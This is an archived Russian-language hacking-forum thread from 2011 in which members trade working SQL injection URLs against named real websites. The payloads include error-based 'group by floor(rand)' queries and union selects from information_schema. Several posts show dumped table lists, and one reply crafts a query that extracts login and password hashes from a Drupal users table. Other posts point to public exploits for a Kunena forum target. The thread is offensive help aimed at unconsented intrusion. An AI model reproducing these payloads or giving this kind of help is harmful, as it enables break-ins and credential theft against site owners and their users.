ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.03.2011, 15:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
30555
Репутация:
85
|
|
Помогите раскрутить!
Сообщение от None
http://zombie.cloud9crew.com/index.php/component/kunena/advsearch?q=hilfe&catids=1%27
|
|
|
|
18.03.2011, 22:55
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от asql
asql said:
Не могу понять как в этом примере вывести information_schema
http://www.airport.lg.ua/index.php?page=3+or+1+group+by+concat(concat_ws(0x 3a3a3a,version(),user(),database()),floor(rand(0)* 2))having+min(0)--+
Заранее спс
http://www.airport.lg.ua/index.php?page=-3+union+select+group_concat(0x0b,table_name)+from+ information_schema.tables+where+table_schema!=0x69 6e666f726d6174696f6e5f736368656d61+--+
aero_buttons,
aero_pages,
aero_pics_pages,
aero_texts
|
|
|
18.03.2011, 22:58
|
|
Новичок
Регистрация: 14.06.2007
Сообщений: 5
Провел на форуме:
3534
Репутация:
0
|
|
Помогите составить запрос. Есть 5 бд, в бд 'de' есть таблица drupal_users, и там есть поля pass,access,login.
При запросе +or+1+group+by+concat((select+concat( login,0x3a,pass)+from+drupal_users+limit+0,1),floo r(rand(0)*2))having+min(0)+or+1+--+
запрос идет в 'de' а в другую бд.
|
|
|
|
18.03.2011, 23:28
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от asql
asql said:
и вот еще
http://www.tis.lg.ua/index.php?mod=page&page=-23'/**//*!union*//**//*!select*//**/1,concat_ws(0x3a3a3a,version(),user(),database()), 3,4--'
при выводе information_schema, ошибка
Заранее спс
http://www.tis.lg.ua/index.php?mod=page&page=-23'+union+select+1,group_concat(0x0b,table_name),3 ,4+from+information_schema.tables+where+table_sche ma!=0x696e666f726d6174696f6e5f736368656d61+--+
gb_aut,
gb_ip,
gb_msg,
gb_settings,
lib_mat,
lib_plan,
lib_razdel,
lib_reelt,
lib_status,
lib_tip,
newnews,
page,
phonebook,
photo,
pr_dom,
pr_kvartira,
pr_nejil,
pr_zemlya
|
|
|
|
18.03.2011, 23:46
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
Сообщение от Dima282
Dima282 said:
Помогите составить запрос. Есть 5 бд, в бд 'de' есть таблица drupal_users, и там есть поля pass,access,login.
При запросе +or+1+group+by+concat((select+concat( login,0x3a,pass)+from+drupal_users+limit+0,1),floo r(rand(0)*2))having+min(0)+or+1+--+
запрос идет в 'de' а в другую бд.
Если я правильно понял эту мысль, то:
Код:
Code:
+or+1+group+by+concat((select+concat(access,0x3a,login,0x3a,pass)+from+de.drupal_users+limit+0,1),floor(rand(0)*2))having+min(0)+or+1+--+
всё по принципу select+колонки+from+бд.таблица
|
|
|
|
19.03.2011, 02:25
|
|
Новичок
Регистрация: 14.06.2007
Сообщений: 5
Провел на форуме:
3534
Репутация:
0
|
|
Подскажите в чем ошибка?
http://www.urvet.ru/index.php?categoryID='+or+1+group+by+concat((selec t+table_ name+from+information_schema.tables+where+table_ schema='z33576_shop'+limit+0,1),fl oor(rand(0)*2))having+min(0)+or+1+--+
|
|
|
|
19.03.2011, 02:28
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://www.urvet.ru/index.php?categoryID=1+or+1+group+by+concat((selec t+table_name+from+information_schema.tables+where+ table_schema=0x7a33333537365f73686f70+limit+0,1),f loor(rand(0)*2))having+min(0)+or+1--+
|
|
|
|
19.03.2011, 08:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
30555
Репутация:
85
|
|
Сообщение от None
Помогите раскрутить!
Цитата:
http://zombie.cloud9crew.com/index.php/component/kunena/advsearch?q=hilfe&catids=1"
Еще актуально
Тут описание данного бага
http://seclists.org/fulldisclosure/2011/Feb/254
Если этот раскрутить не удается предположительно есть еще одна бага тут
http://zombie.cloud9crew.com/index.php?option=com_kunena&Itemid=86&func=announc ement&do=
Описание тут
http://www.exploit-db.com/exploits/11279/
тут есть эксплойт
http://www.exploit-db.com/exploits/9408/
|
|
|
|
19.03.2011, 20:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
8829
Репутация:
-3
|
|
Из information_schema таблицы и колонки выводятся нормально, но вывод из таблиц не происходит. Какие есть альтернативы вот этому?
...5,6,login,pass+from+users+limit+0,1--
|
|
|
|
19.03.2011, 21:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Сообщение от asql
asql said:
Из information_schema таблицы и колонки выводятся нормально, но вывод из таблиц не происходит. Какие есть альтернативы вот этому?
...5,6,login,pass+from+users+limit+0,1--
Узнаешь table_schema > select 1, table_schema,3 from information_schema.tables where table_name=' table_name'--
Выводишь данные > select 1,concat_ws(0x3a,username,password),3 from table_schema. table_name
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
